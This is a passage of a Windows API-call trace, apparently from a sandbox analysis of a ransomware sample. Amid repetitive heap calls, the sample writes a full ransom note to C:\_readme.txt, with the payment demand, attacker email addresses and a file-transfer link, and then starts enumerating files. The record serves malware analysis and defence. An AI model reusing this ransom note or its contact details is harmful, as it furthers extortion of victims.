HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.452] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.452] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.452] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.452] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.452] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.452] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.452] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.452] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0xc46) returned 0x32ef368 [0209.452] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.453] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32ef368 | out: hHeap=0x750000) returned 1 [0209.453] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.453] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.453] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.453] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0xc2e) returned 0x32ef368 [0209.453] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.453] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32ef368 | out: hHeap=0x750000) returned 1 [0209.453] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x860) returned 0x32ef368 [0209.453] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32ef368 | out: hHeap=0x750000) returned 1 [0209.453] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x860) returned 0x32ef368 [0209.453] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32ef368 | out: hHeap=0x750000) returned 1 [0209.453] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.453] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.453] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.453] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.453] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.453] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0xc46) returned 0x32ef368 [0209.453] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.453] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32ef368 | out: hHeap=0x750000) returned 1 [0209.453] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x840) returned 0x32d9428 [0209.453] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.453] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x840) returned 0x32d9428 [0209.453] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.454] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.454] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.454] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.454] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.454] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.454] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.454] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.454] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.454] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.454] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.454] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.454] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.454] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.454] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.454] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.454] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0xc46) returned 0x32ef368 [0209.454] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.454] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32ef368 | out: hHeap=0x750000) returned 1 [0209.454] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.454] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.454] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x860) returned 0x32ef368 [0209.454] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32ef368 | out: hHeap=0x750000) returned 1 [0209.454] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x860) returned 0x32ef368 [0209.455] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32ef368 | out: hHeap=0x750000) returned 1 [0209.455] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.455] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.455] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.455] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.455] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.455] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0xc46) returned 0x32ef368 [0209.455] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.455] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32ef368 | out: hHeap=0x750000) returned 1 [0209.455] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x840) returned 0x32d9428 [0209.455] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.455] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x840) returned 0x32d9428 [0209.455] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.455] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.455] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.455] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.455] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.455] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.455] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.455] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.455] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.455] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.455] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.455] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.456] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.456] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.456] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.456] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.456] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0xc46) returned 0x32ef368 [0209.456] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.456] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32ef368 | out: hHeap=0x750000) returned 1 [0209.456] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.456] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.456] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x860) returned 0x32ef368 [0209.456] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32ef368 | out: hHeap=0x750000) returned 1 [0209.456] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x860) returned 0x32ef368 [0209.456] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32ef368 | out: hHeap=0x750000) returned 1 [0209.456] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.456] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.456] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.456] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.456] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.456] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0xc46) returned 0x32ef368 [0209.456] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.456] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32ef368 | out: hHeap=0x750000) returned 1 [0209.456] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x840) returned 0x32d9428 [0209.456] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.456] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.457] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.457] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.457] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.457] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.457] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.457] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.457] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.457] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.457] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.457] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0209.457] PathFindFileNameW (pszPath="") returned="" [0209.457] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x761b0000 [0209.458] GetProcAddress (hModule=0x761b0000, lpProcName="SHGetFolderPathW") returned 0x76235708 [0209.458] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x800) returned 0x32ef368 [0209.458] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x32ef368 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0209.458] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x810) returned 0x32d9428 [0209.458] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.458] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.458] FreeLibrary (hLibModule=0x761b0000) returned 1 [0209.469] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.469] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32ef368 | out: hHeap=0x750000) returned 1 [0209.469] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x806) returned 0x32ef368 [0209.469] PathAppendW (in: pszPath="C:\\", pMore="_readme.txt" | out: pszPath="C:\\_readme.txt") returned 1 [0209.469] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x810) returned 0x32d9428 [0209.469] PathFileExistsW (pszPath="C:\\_readme.txt") returned 0 [0209.527] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x7d00) returned 0x3a83058 [0209.527] lstrcpyW (in: lpString1=0x3a83058, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6" [0209.528] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6", lpString2="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk" [0209.528] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x810) returned 0x32d9cb0 [0209.528] CreateFileW (lpFileName="C:\\_readme.txt" (normalized: "c:\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x618 [0209.531] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x8c0) returned 0x3a8ad60 [0209.531] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x85a) returned 0x3a8b628 [0209.531] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk", cchWideChar=-1, lpMultiByteStr=0x3a8b628, cbMultiByte=2138, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk", lpUsedDefaultChar=0x0) returned 1115 [0209.531] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x860) returned 0x3a8be90 [0209.531] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a8b628 | out: hHeap=0x750000) returned 1 [0209.531] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a8ad60 | out: hHeap=0x750000) returned 1 [0209.531] lstrlenA (lpString="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk") returned 1114 [0209.531] WriteFile (in: hFile=0x618, lpBuffer=0x3a8be90*, nNumberOfBytesToWrite=0x45a, lpNumberOfBytesWritten=0x397fb64, lpOverlapped=0x0 | out: lpBuffer=0x3a8be90*, lpNumberOfBytesWritten=0x397fb64*=0x45a, lpOverlapped=0x0) returned 1 [0209.533] CloseHandle (hObject=0x618) returned 1 [0209.534] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a8be90 | out: hHeap=0x750000) returned 1 [0209.534] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.535] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.535] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32ef368 | out: hHeap=0x750000) returned 1 [0209.535] FindFirstFileW (in: lpFileName="C:\\*", lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xd29f5adc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2dfdd420, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2dfdd420, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="$Recycle.Bin", cAlternateFileName="")) returned 0x3277d28 [0209.535] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.535] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x30) returned 0x323da20 [0209.535] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.535] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x30) returned 0x323da58 [0209.535] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x1c) returned 0x3286300 [0209.535] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x30) returned 0x323da90 [0209.535] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x323da58 | out: hHeap=0x750000) returned 1 [0209.535] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x323da20 | out: hHeap=0x750000) returned 1 [0209.535] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac30ebc0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac30ebc0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Boot", cAlternateFileName="")) returned 1 [0209.535] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286378 [0209.535] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286288 [0209.536] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x38) returned 0x3277d68 [0209.536] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x30) returned 0x323da20 [0209.536] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x323da90 | out: hHeap=0x750000) returned 1 [0209.536] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.536] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.536] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286288 | out: hHeap=0x750000) returned 1 [0209.536] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286378 | out: hHeap=0x750000) returned 1 [0209.536] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x27, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, 